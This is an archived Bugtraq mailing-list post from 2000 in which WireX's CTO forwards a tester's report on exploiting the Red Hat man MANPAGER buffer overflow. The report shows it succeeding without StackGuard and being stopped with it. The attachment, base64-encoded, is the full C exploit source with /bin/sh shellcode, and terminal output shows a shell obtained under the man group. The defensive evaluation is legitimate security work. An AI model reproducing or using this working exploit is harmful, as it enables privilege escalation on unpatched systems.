Bugtraq mailing list archives
Re: No-Exec Stack Smashing 101
From: crispin () WIREX COM (Crispin Cowan)
Date: Thu, 20 Apr 2000 05:00:42 +0000
"Granquist, Lamont" wrote:
Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it). And I'm looking for a little help here. What I've been playing with so far is things like the following trying to sort out the parameters of the buffer overflow. ... So, anyone got any tips for where to point the RA and what the stack
should look like?
At WireX we've been doing some fresh vulnerability testing. In the attached e-mail, M.C.Mar <woloszyn () ipartners pl> describes his work for us demonstrating an exploit against the man vulnerability, and then demonstrating that the StackGuarded version of man is not vulnerable. We are intent on undertaking a continuous evaluation process of testing every working stack smashing exploit we can find for StackGuard compatible platforms (x86/Linux, esp. Red Hat). We would appreciate any help we can get in getting live exploits to actually work. We succeeded with man, but failed with ircii. Crispin ----- Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com Free Hardened Linux Distribution: http://immunix.org JOBS! http://immunix.org/jobs.html
From - Thu Apr 20 04:46:54 2000
Return-Path: <woloszyn () ipartners pl> Delivered-To: crispin () wirex com Received: from mr1.ipartners.pl (mr1.ipartners.pl [157.25.5.18]) by mithra.wirex.com (Postfix) with ESMTP id 6C3C93EC14 for <crispin () wirex com>; Tue, 4 Apr 2000 11:25:20 -0700 (PDT) Received: from zloty.it.com.pl (zloty.it.com.pl [195.94.200.4]) by mr1.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id UAA83999 for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:08 +0200 (CEST) (envelope-from woloszyn () ipartners pl) Received: from localhost (woloszyn@localhost) by zloty.it.com.pl with ESMTP id UAA00373 for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:07 +0200 (MET DST) X-Authentication-Warning: zloty.it.com.pl: woloszyn owned process doing -bs Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST) From: "M.C.Mar" <woloszyn () ipartners pl> X-Sender: woloszyn () zloty it com pl To: Crispin Cowan <crispin () wirex com> Subject: Re: First Penetration Test In-Reply-To: <38E995DB.4692065C () wirex com> Message-ID: <Pine.GSO.4.03.10004042007130.28715-200000 () zloty it com pl> MIME-Version: 1.0 Content-Type: MULTIPART/DIGEST; BOUNDARY=------------B3356C5E2D4CB4E848D2CED2 Content-ID: <Pine.GSO.4.03.10004042007131.28715 () zloty it com pl> Status: X-Mozilla-Status: 8011 X-Mozilla-Status2: 00000000 X-UIDL: 3878981500002a3a This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime () docserver cac washington edu for more info. --------------B3356C5E2D4CB4E848D2CED2 Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1 Content-Transfer-Encoding: 8BIT Content-ID: <Pine.GSO.4.03.10004042007132.28715 () zloty it com pl> OK. I have only two hours today so I started with man. I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular egcs-1.1.2-12.i386 I have installed on my RH 6.0. I Tuned the exploit to produce shell on my system: [emsi@pipek ~]$ ./a.out RET: 0xbffff470 len: 4073 sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh Error executing formatting or display command. System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó bash$ id uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi) bash$ I attached the exploit. Then I recompiled the vulnerable code with gcc-2.7.2.3-14_SGc2_SG121.i386.rpm and tested StackGuarded code with my explot: [emsi@pipek ~]$ ./a.out RET: 0xbffff470 len: 4073 sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh Error executing formatting or display command. System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74 in procedure display_cat_file. As I mentioned at the beginig I have only two hours so I didn't examine the vulnerable code whether it is posible to exploit the vulnerability bypassing StacGuard protection. -- Mariusz Wo³oszyn Internet Security Specialist, IT -- Internet Partners E-mail: Mariusz.Woloszyn () it pl, woloszyn () it pl --------------B3356C5E2D4CB4E848D2CED2 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4man.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.GSO.4.03.10004042023070.28715 () zloty it com pl> Content-Description: Content-Disposition: attachment; filename="4man.c" LyoNCiAqIFJld3JpdGVuIGZyb206DQogKiAoYykgMjAwMCBiYWJjaWEgcGFk bGluYSAvIGIwZg0KICogKGxjYW10dWYncyBpZGVhKQ0KICogYnkgS2lsM3Ig b2YgTGFtM3JaDQogKiANCiAqIHJlZGhhdCA2LjEgL3Vzci9iaW4vbWFuIGV4 cGxvaXQNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN5 cy9wYXJhbS5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8 c3RyaW5nLmg+DQoNCiNkZWZpbmUgTk9QCQkweDkwDQojZGVmaW5lIE9GUwkJ MTgwMA0KI2RlZmluZSBCVUZTSVpFCQk0MDE3DQojZGVmaW5lIEFERFJTCQkx MDAwDQoNCmxvbmcgZ2V0ZXNwKHZvaWQpDQp7DQogICBfX2FzbV9fKCJtb3Zs ICVlc3AsICVlYXhcbiIpOw0KfQ0KDQppbnQgbWFpbihhcmdjLCBhcmd2KQ0K aW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsNCgljaGFyICpleGVjc2hlbGwg PQ0KCSJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2 XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KCSJceDg5XHhmM1x4OGRceDRl XHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4NDBc eGNkIg0KCSJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K CWNoYXIgYnVmW0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCldLCAqcDsNCglp bnQgbm9wbGVuLCBpLCBvZnM7DQoJbG9uZyByZXQsICphcDsNCg0KCXJldCA9 IGdldGVzcCgpICsgT0ZTOw0KDQoJbWVtc2V0KGJ1ZixOT1AsQlVGU0laRStz dHJsZW4oZXhlY3NoZWxsKSk7DQoJbWVtY3B5KGJ1ZitCVUZTSVpFLShzdHJs ZW4oZXhlY3NoZWxsKSsyMCksZXhlY3NoZWxsLHN0cmxlbihleGVjc2hlbGwp KTsNCg0KCXA9YnVmK0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCktNDsNCglh cD0oaW50ICopcDsNCgkqYXA9cmV0OyAvLzB4NDY0NjQ2NDY7DQoNCglmcHJp bnRmKHN0ZGVyciwgIlJFVDogMHgleCAgbGVuOiAlZFxuXG4iLCByZXQsIHN0 cmxlbihidWYpKTsNCg0KCXNldGVudigiTUFOUEFHRVIiLCBidWYsIDEpOw0K CWV4ZWNsKCIuL21hbiIsICJtYW4iLCAibHMiLCAwKTsNCg0KCXJldHVybiAw Ow0KfQ0K --------------B3356C5E2D4CB4E848D2CED2--
Current thread:
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)